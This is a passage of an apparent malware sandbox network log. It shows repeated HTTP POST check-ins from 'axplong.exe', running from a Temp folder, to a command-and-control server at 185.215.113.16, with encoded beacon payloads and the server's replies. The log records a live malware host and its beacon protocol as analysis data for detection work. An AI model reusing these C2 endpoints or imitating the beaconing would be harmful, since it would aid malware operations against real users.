Aug 19, 2024 06:04:20.222733021 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:20.475478888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:20.592134953 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:21.342112064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:21.343158960 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:21.589850903 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:21.703495026 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:22.465619087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:22.522083998 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:22.770267010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:23.092601061 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:23.854127884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:23.854988098 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:24.105228901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:24.216782093 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:24.985553026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:24.986649990 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:25.240358114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:25.460649967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:26.129812956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:26.130620003 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:26.380980015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:26.497684002 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:27.295145035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:27.301378012 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:27.556895018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:27.716563940 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:28.478374958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:28.479024887 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:28.729768991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:28.841790915 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:29.613315105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:29.650537014 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:29.910810947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:30.092559099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:30.844630957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:30.869196892 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:31.119473934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:31.232507944 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:31.986138105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:31.989109039 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:32.238320112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:32.357760906 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:33.106111050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:33.195772886 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:33.442699909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:33.801460028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:34.553483009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:34.554955959 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:34.802566051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
